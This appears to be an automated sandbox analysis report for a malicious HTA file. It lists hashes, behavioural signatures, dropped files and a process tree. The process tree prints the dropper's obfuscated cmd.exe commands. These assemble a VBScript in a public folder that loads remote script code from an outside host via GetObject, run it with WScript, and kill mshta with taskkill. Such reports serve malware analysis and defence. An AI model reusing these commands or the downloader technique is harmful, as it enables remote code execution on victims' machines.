Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    29/08/2024, 09:23

General

  • Target

    test.hta

  • Size

    147B

  • MD5

    0144b746edf817419d3fe42b0c50fe92

  • SHA1

    f469ffccdf5213f4be17608d2b44d738a604b807

  • SHA256

    7e360e8b091aab014189554faeef805a3ae2ffd11124fd4ffdd827abf3be7306

  • SHA512

    da5447e4ea8313b7cfdc5bb7c3dffe8c21cf2ae5b07c653f0abd125415647f71330c84502f5a0eafdbd7b1a465d0de103ed9598e9183d6587f08299d0df683a2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\test.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo WLzi1c22="ri">C:\Users\Public\vvcH43.vbs&&echo IZ4u450="tp">>C:\Users\Public\vvcH43.vbs&&echo hMJQ6C71=".":OduoBTg12="sC" ^& WLzi1c22 ^& "pt:ht" ^& IZ4u450 ^& "s://">>C:\Users\Public\vvcH43.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3028
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c echo|set /p=^"OduoBTg12^=OduoBTg12 ^& ^"43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1^":GetO^">>C:\Users\Public\\vvcH43.vbs&echo|set /p=^"bject(^">>C:\Users\Public\\vvcH43.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2768
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="OduoBTg12=OduoBTg12 & "43"+hMJQ6C71+"244"+hMJQ6C71+"109"+hMJQ6C71+"208"+hMJQ6C71+"host"+hMJQ6C71+"secureserver"+hMJQ6C71+"net/g1":GetO" 1>>C:\Users\Public\\vvcH43.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2892
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2820
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="bject(" 1>>C:\Users\Public\\vvcH43.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c "echo _>>C:\Users\Public\\vvcH43.vbs&&echo OduoBTg12)>>C:\Users\Public\\vvcH43.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2772
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\\vvcH43.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\vvcH43.vbs"
        3⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2300
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /F /IM mshta.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1448

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\04788E6207035207B8930FC2CDD3C940

    Filesize

    504B

    MD5

    98df72bb54091099af3a2120b9f6786a

    SHA1

    7c629a82e6043390a067890565cafbfb6d6feb04

    SHA256

    565456ad44f24835fc8b4291cd293c15b5816bf3953221bf43439bb8d8c243ba

    SHA512

    e674e62a32f1ef57de54e9248a62a520827d005278e7f376d460ad76c17a989523fb351022def512f801e8bbc3c8d33882277d5091f5b27abbccda208e61ccb3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\04788E6207035207B8930FC2CDD3C940

    Filesize

    554B

    MD5

    657c8ac147a92f54cd4f0f1997accab0

    SHA1

    9b46849fadf27c222840e98aa8e8e9883d6d6c6f

    SHA256

    65b8b1a1dd569e7763c15cd8f3f6478eb61dcb0c0ad3cc1ec4ff4bf4b38f5afe

    SHA512

    4f2ffe225a14a4d67cf5216795dcd4af878d5c247e467b53729b3a273300177d224c68be0283d3b580d39b38dcbb64bf35cae24e6661b10e5c8c25559e10f3d2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    7201e109a2fc6dda1db0df301876a8db

    SHA1

    e1655d367b6e682195404a75214428cefe565c6e

    SHA256

    7c09aaa5ce46c82912bbb63b5a58f7902b935a260cf512c23a7eecd54ddf7255

    SHA512

    3e6d6e6f336db068ea2897c0cc4f14c4a0857eb90d38b9b18c286d3ed27ac505f6f31433ada59d2456c658711040db2c1729a191d0c091303bb3f84bc6a5e3c0

  • C:\Users\Admin\AppData\Local\Temp\CabE070.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Public\vvcH43.vbs

    Filesize

    98B

    MD5

    0cd354827105e75b556094e7de26cbb7

    SHA1

    4e51cd87dcc34fbc2eef24627bfb3ab79c9e2b72

    SHA256

    c999dc13194bdb0f517cbee4431c655761a2a96de29755e6f9f63de7931d5707

    SHA512

    958410f2173fd08adb726397194212f145aa2e8e3d13ae50c9d2968f29177202979aac106bb2651505a91e638947c56fc85fa11adda8e22a8c440ccf063e55fe

  • C:\Users\Public\vvcH43.vbs

    Filesize

    238B

    MD5

    e2a22af70bf4b9205ed04bc63fe04bc7

    SHA1

    e6cb55d932cf06de83495859e6e479d0dfc2b62a

    SHA256

    acdbdd62510404a1e90793bdb71adad7ac95e98b96b4a6122bcb9f8daaa1c8b9

    SHA512

    94e44876f80f293f5290c3a0333764e7f7c2e1334aafbc42e6b41db07d6d7b67aba1fface70840f1655c52774fef4b0d55948d7667f712cce4567d056a4fd7f9

  • C:\Users\Public\vvcH43.vbs

    Filesize

    241B

    MD5

    30b71cb46c0a264fbc232d429bc67ead

    SHA1

    64ea1a1778efa0a8dc5bef94af04b9b40b0856ea

    SHA256

    2b9ef78793c3383fa2c28fa2b4c2ddf2bbb8237b916c72007de97df31045db49

    SHA512

    07f40ae25a0ea15fede16e368419187d78ad98edf5d0637e9a0b9ce29181df072c0d3648b8e99dcb81a5809180df1a22c25c7ec04e82c7c6da89c0f675e9a1d9

  • C:\Users\Public\vvcH43.vbs

    Filesize

    253B

    MD5

    5df54ea4c54de9e8ad092eeac6026f9f

    SHA1

    eb6456597a1517df01a163393c660de6ff7206da

    SHA256

    9ce80b592750d0f78f35ac4215c1925ca6ee3161a9e4aa257a1cf0228952e3d5

    SHA512

    fe7f49ff04578bb209a39d84ef4530d7fe31cbdd70405d6c43eb9a571187e28ae7547843add6131ea9b24f469d02b3a884dff6d7a43e0b0a0cd819fc40c74fc3